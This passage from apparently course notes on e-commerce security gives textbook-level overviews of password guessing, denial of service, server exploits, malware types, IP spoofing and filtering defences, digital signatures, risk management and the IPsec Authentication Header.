cannot decipher what message was sent.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 14 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY Figure
4.
Attacker
sniffing
the
network
between
client
and
server
Guessing passwords Another common attack is to guess a user's password. This style of attack is manual or automated. Manual attacks are laborious, and only successful if the attacker knows something about the shopper. For example, if the shopper uses their child's name as the password. Automated attacks have a higher likelihood of success, because the probability of guessing a user ID/password becomes more significant as the number of tries increases. Tools exist that use all the words in the dictionary to test user ID/password combinations, or that attack popular user ID/password combinations. The attacker can automate to go against multiple sites at one time. Using denial of service attacks The denial of service attack is one of the best examples of impacting site availability. It involves getting the server to perform a large number of mundane tasks, exceeding the capacity of the server to cope with any other task. For example, if everyone in a large meeting asks you your name all at once, and every time you answer, they ask you again. You have experienced a personal denial of service attack. To ask a computer its name, you use ping. You can use ping to build an effective DoS attack. The smart hacker gets the server to use more computational resources in processing the request than the adversary does in generating the request. Distributed DoS is a type of attack used on popular sites, such as Yahoo! In this type of attack, the hacker infects computers on the Internet via a virus or other means. The infected computer becomes slaves to the hacker. Denial of service attacks:
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 15 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY Using known server bugs The attacker analyzes the site to find what types of software are used on the site. He then proceeds to find what patches were issued for the software. Additionally, he searches on how to exploit a system without the patch. He proceeds to try each of the exploits. The sophisticated attacker finds a weakness in a similar type of software, and tries to use that to exploit the system. This is a simple, but effective attack. With millions of servers online, what is the probability that a system administrator forgot to apply a patch? Using server root exploits Root exploits refer to techniques that gain super user access to the server. This is the most coveted type of exploit because the possibilities are limitless. When you attack a shopper or his computer, you can only affect one individual. With a root exploit, you gain control of the merchants and all the shoppers' information on the site. There are two main types of root exploits: buffer overflow attacks and executing scripts against a server. In a buffer overflow attack, the hacker takes advantage of specific type of computer program bug that involves the allocation of storage during program execution. The technique involves tricking the server into execute code written by the attacker. The other technique uses knowledge of scripts that are executed by the server. This is easily and freely found in the programming guides for the server. The attacker tries to construct scripts in the URL of his browser to retrieve information from his server. This technique is frequently used when the attacker is trying to retrieve data from the server's database.
A-6 Antivirus Technologies Acomputer virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. The term virus is often extended to refer to computer worms and other sorts of malware. The most common are: Viruses - A virus is a small piece of software that piggybacks on other programs or files. Each time the program runs or file opens, the virus runs, too. It can reproduce itself by attaching to other programs or files or wreak havoc. E-mail viruses - An e-mail virus moves around in e-mail messages, and usually replicates itself by automatically mailing itself to dozens of people in the victim's e-mail address book. Pharmers send e-mails contains a virus that installs small software programs on users' computers. When a user tries to go to the bank's real Web site, the program redirects the browser to the pharmer's fake site. It then asks •
•
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 16 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY a user to update information such as logons, PIN codes or other sensitive information. Worms - A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well. Trojan horses - A Trojan horse is simply a computer program, which claims to do one thing but instead does damage such as erase your hard disk when you run it. Trojan horses have no way to replicate automatically. Anti-virus software and other countermeasures There are many anti-virus software products svailable that can detect and eliminate known viruses. Some virus scanners can also warn a user if a file is likely to contain a virus based on the file type. Some antivirus vendors also claim the effective use of other types of heuristic analysis, which work by examining the contents of the computer's memory (its RAM, and boot sector) and the files stored on fixed or removable drives (hard drives, floppy drives), and comparing those files against a database of known virus "signatures". Some anti-virus programs are able to scan opened files in addition to sent and received emails 'on the fly' in a similar manner. This practice is known as "on-access scanning." Anti-virus software typically does not change the underlying capability of host software to transmit viruses. Anti-virus software must be updated regularly for the latest threats and hoaxes. Antivirus software typically has the host based version for individual PCs and workstations and the gateway version to protect a network or a subnetwork. Now, antivirus technologies are often combined with other technologies such as anti-spam, anti-spyware, firewalls and intrusion detections to provide broader protection to end users. Anti-virus systems are trationally software solutions. When one system is performing mutiple functions such as scanning virus, spam, spyware and detect and blocking intrusions, the performance becomes one of the main concerns. To increase performance of such integrated gateways and reduce delay of message passing though, many integrated gateway products are migrating from pure software products to a combination of hardware and software. Now, many integrated gateways have achieved line speed at the gigabit or multi-gagabit level. •
•
A-7 In computer networking, the term IP address spoofing or IP spoofing refers to the creation of Internet Protocol (IP) packets with a forged source IP address, called MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 17 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY spoofing, with the purpose of concealing the identity of the sender or impersonating another computing system. Background The basic protocol for sending data over the Internet network and many other computer networks is the Internet Protocol ("IP"). The header of each IP packet contains, among other things, the numerical source and destination address of the packet. The source address is normally the address that the packet was sent from. By forging the header so it contains a different address, an attacker can make it appear that the packet was sent by a different machine. The machine that receives spoofed packets will send response back to the forged source address, which means that this technique is mainly used when the attacker does not care about the response or the attacker has some way of guessing the response. In certain cases, it might be possible for the attacker to see or redirect the response to his own machine. The most usual case is when the attacker is spoofing an address on the same LAN or WAN. Hence the hackers have an unauthorized access over computers. Applications IP spoofing is most frequently used in denial-of-service attacks. In such attacks, the goal is to flood the victim with overwhelming amounts of traffic, and the attacker does not care about receiving responses to the attack packets. Packets with spoofed addresses are thus suitable for such attacks. They have additional advantages for this purpose—they are more difficult to filter since each spoofed packet appears to come from a different address, and they hide the true source of the attack. Denial of service attacks that use spoofing typically randomly choose addresses from the entire IP address space, though more sophisticated spoofing mechanisms might avoid unroutable addresses or unused portions of the IP address space. The proliferation of large botnets makes spoofing less important in denial of service attacks, but attackers typically have spoofing available as a tool, if they want to use it, so defenses against denial-of-service attacks that rely on the validity of the source IP address in attack packets might have trouble with spoofed packets. Backscatter , a technique used to observe denial-of-service attack activity in the Internet, relies on attackers' use of IP spoofing for its effectiveness. IP spoofing can also be a method of attack used by network intruders to defeat network security measures, such as authentication based on IP addresses. This method of attack on a remote system can be extremely difficult, as it involves modifying thousands of packets at a time. This type of attack is most effective where trust relationships exist between machines. For example, it is common on some corporate networks to have internal systems trust each other, so that users can log in without a username or password provided they are connecting from another machine on the internal network (and so must already be logged in). By spoofing a connection from a trusted machine, an attacker may be able to access the target machine without an authentication. Another more-recent use is to change a computer's country of origin for the purposes of accessing internet content limited to specific geopolitical areas. For example, Hulu's online-tv service can only be accessed by American residents, but theoretically also by computers spoofing american locations. Services vulnerable to IP spoofing Configuration and services that are vulnerable to IP spoofing: RPC (Remote Procedure Call services) •
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 18 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY Any service that uses IP address authentication The X Window system The R services suite (rlogin, rsh, etc.) Defense against spoofing Packet filtering is one defense against IP spoofing attacks. The gateway to a network usually performs ingress filtering, which is blocking of packets from outside the network with a source address inside the network. This prevents an outside attacker spoofing the address of an internal machine. Ideally the gateway would also perform egress filtering on outgoing packets, which is blocking of packets from inside the network with a source address that is not inside. This prevents an attacker within the network performing filtering from launching IP spoofing attacks against external machines. It is also recommended to design network protocols and services so that they do not rely on the IP source address for authentication. • • •
A-8 A digital signature or digital signature scheme is a mathematical scheme for demonstrating the authenticity of a digital message or document. A valid digital signature gives a recipient reason to believe that the message was created by a known sender, and that it was not altered in transit. Digital signatures are commonly used for software distribution, financial transactions, and in other cases where it is important to detect forgery and tampering. Digital signatures are often used to implement electronic signatures, a broader term that refers to any electronic data that carries the intent of a signature,[1] but not all electronic signatures use digital signatures.[2][3][4] In some countries, including the United States, and in the European Union, electronic signatures have legal significance. However, laws concerning electronic signatures do not always make clear whether they are digital cryptographic signatures in the sense used here, leaving the legal definition, and so their importance, somewhat confused. Digital signatures employ a type of asymmetric cryptography. For messages sent through an insecure channel, a properly implemented digital signature gives the receiver reason to believe the message was sent by the claimed sender. Digital signatures are equivalent to traditional handwritten signatures in many respects; properly implemented digital signatures are more difficult to forge than the han dwritten type. Digital signature schemes in the sense used here are cryptographically based, and must be implemented properly to be effective. Digital signatures can also provide non-repudiation, meaning that the signer cannot successfully claim they did not sign a message, while also claiming their private MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 19 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY key remains secret; further, some non-repudiation schemes offer a time stamp for the digital signature, so that even if the private key is exposed, the signature is valid nonetheless. Digitally signed messages may be anything representable as a bitstring: examples include electronic mail, contracts, or a message sent via some other cryptographic protocol. Definition
Diagram showing how a simple digital signature is app lied and then verified A digital signature scheme typically consists of three algorithms: A key generation algorithm that selects a private key uniformly at random from a set of possible private keys. The algorithm outputs the private key and a corresponding public key. A signing algorithm which, given a message and a private key, produces a signature. A signature verifying algorithm which given a message, public key and a signature, either accepts or rejects. Two main properties are required. First, a signature generated from a fixed message and fixed private key should verify on that message and the corresponding public key. Secondly, it should be computationally infeasible to generate a valid signature for a party who does not possess the private key. •
•
•
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 20 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
A-9 Risk management is the identification, assessment, and prioritization of risks followed by coordinated and economical application of resources to minimize, monitor, and control the probability and/or impact of unfortunate events.[1] Risks can come from uncertainty in financial markets, project failures, legal liabilities, credit risk, accidents, natural causes and disasters as well as deliberate attacks from an adversary. Several risk management standards have been developed including the Project Management Institute, the National Institute of Science and Technology, actuarial societies, and ISO standards.[2] [3] Methods, definitions and goals vary widely according to whether the risk management method is in the context of project management, security, engineering, industrial processes, financial portfolios, actuarial assessments, or public health and safety. The strategies to manage risk include transferring the risk to another party, avoiding the risk, reducing the negative effect of the risk, and accepting some or all of the consequences of a particular risk. Certain aspects of many of the risk management standards have come under criticism for having no measurable improvement on risk even though the confidence in estimates and decisions increase.[1] Introduction This section provides an introduction to the principles of risk management. The vocabulary of risk management is defined in ISO Guide 73, "Risk management. Vocabulary".
In ideal risk management, a prioritization process is followed whereby the risks with the greatest loss and the greatest probability of occurring are handled first, and risks with lower probability of occurrence and lower loss are handled in descending order. In practice the process can be very difficult, and balancing between risks with a high probability of occurrence but lower loss versus a risk with high loss but lower probability of occurrence can often be mishandled. Intangible risk management identifies a new type of a risk that has a 100% probability of occurring but is ignored by the organization due to a lack of identification ability. For example, when deficient knowledge is applied to a situation, a knowledge risk materialises. Relationship risk appears when ineffective collaboration occurs. Processengagement risk may be an issue when ineffective operational procedures are applied. These risks directly reduce the productivity of knowledge workers, decrease cost effectiveness, profitability, service, quality, reputation, brand value, and earnings quality. Intangible risk management allows risk management to create immediate value from the identification and reduction of risks that reduce productivity. Risk management also faces difficulties allocating resources. This is the idea of opportunity cost. Resources spent on risk management could have been spent on more
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 21 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY profitable activities. Again, ideal risk management minimizes spending while maximizing the reduction of the negative effects of risks. Methodology
For the most part, these methodologies consist of the following elements, performed, more or less, in the following order. 1. identify, characterize, and assess threats 2. assess the vulnerability of critical assets to specific threats 3. determine the risk (i.e. the expected consequences of specific types of attacks on specific assets) 4. identify ways to reduce those risks 5. prioritize risk reduction measures based on a strategy Principles of risk management
The International Organization for Standardization identifies the following principles of risk management: Risk management should create value. Risk management should be an integral part of organizational processes. Risk management should be part of decision making. Risk management should explicitly address uncertainty. Risk management should be systematic and structured. Risk management should be based on the best available information. Risk management should be tailored. Risk management should take into account human factors. Risk management should be transparent and inclusive. Risk management should be dynamic, iterative and responsive to change. Risk management should be capable of continual improvement and enhancement. • • • • • • • • • • •
Process According to the standard ISO 31000 "Risk management -- Principles and guidelines on implementation", the process of risk management con sists of several steps as follows: 1. Identification of risk in a selected domain of interest 2. Planning the remainder of the process. 3. Mapping out the following: the social scope of risk management o the identity and objectives of stakeholders o the basis upon which risks will be evaluated, constraints. o 4. Defining a framework for the activity and an agenda for identification. 5. Developing an analysis of risks involved in the process. 6. Mitigation of risks using available technological, human and organizational resources.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 22 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
A-10 Internet Protocol Security (IPsec) is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a data stream. IPsec also includes protocols for establishing mutual authentication between agents at the beginning of the session and negotiation of cryptographic keys to be used during the session. IPsec can be used to protect data flows between a pair of hosts (e.g. computer users or servers), between a pair of security gateways (e.g. routers or firewalls), or between a security gateway and a host. [1] IPsec is a dual mode, end-to-end, security scheme operating at the Internet Layer of the Internet Protocol Suite or OSI model Layer 3. Some other Internet security systems in widespread use, such as Secure Sockets Layer (SSL), Transport Layer Security (TLS) and Secure Shell (SSH), operate in the upper layers of these models. Hence, IPsec can be used for protecting any application traffic across the Internet. Applications need not be specifically designed to use IPsec. The use of TLS/SSL, on the other hand, must typically be incorporated into the design of applications. IPsec is a successor of the ISO standard Network Layer Security Protocol (NLSP). NLSP was based on the SP3 protocol that was published by NIST, but designed by the Secure Data Network System project of the National Security Agency (NSA). IPsec is officially specified by the Internet Engineering Task Force (IETF) in a series of Request for Comments addressing various components and extensions, including the official capitalization style of the term. Security architecture The IPsec suite is a framework of open standards. IPsec uses the following protocols to perform various functions: [2][3] Internet key exchange (IKE and IKEv2) to set up a security association (SA) by handling negotiation of protocols and algorithms and to generate the encryption and authentication keys to be used by IPsec. [4][5] Authentication Header (AH) to provide connectionless integrity and data origin authentication for IP datagrams and to provide protection against replay attacks. [6] •
•
[7] •
Encapsulating Security Payload (ESP) to provide confidentiality, data origin authentication, connectionless integrity, an anti-replay service (a form of partial sequence integrity), and limited traffic flow confidentiality. [1]
[edit] Authentication Header
Authentication Header (AH) is a member of the IPsec protocol suite. AH guarantees connectionless integrity and data origin authentication of IP packets. Further, it can optionally protect against replay attacks by using the sliding window technique and discarding old packets. AH protects the IP payload and all header fields of an IP datagram except for mutable fields (i.e. those that might be altered in transit). [6] In IPv4, mutable (and therefore unauthenticated) IP header fields include DSCP/TOS, Flags, Fragment Offset, TTL and Header Checksum. AH operates directly on top of IP, using IP protocol number 51.[8] •
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 23 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY The following AH packet diagram shows how an AH packet is constructed and interpreted: 0 - 7 bit
8 - 15 bit
16 - 23 bit
Next header
Payload length
RESERVED
24 - 31 bit
Security parameters index (SPI) Sequence number Authentication data (variable) Field meanings: Next header The Next Header is an 8-bit field that identifies the type of the next payload after the Authentication Header. The value of this field is chosen from the set of IP Protocol Numbers defined in the most recent "Assigned Numbers" RFC from the Internet Assigned Numbers Authority. See List of IP protocol numbers. Payload length Size of AH packet. RESERVED Reserved for future use (all zero until then). Security parameters index (SPI) Identifies the security parameters, which, in combination with the IP address, then identify the security association implemented with this packet. Sequence number A monotonically increasing number, used to prevent replay attacks. Authentication data Contains the integrity check value (ICV) necessary to authenticate the packet; it may contain padding.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 24 -
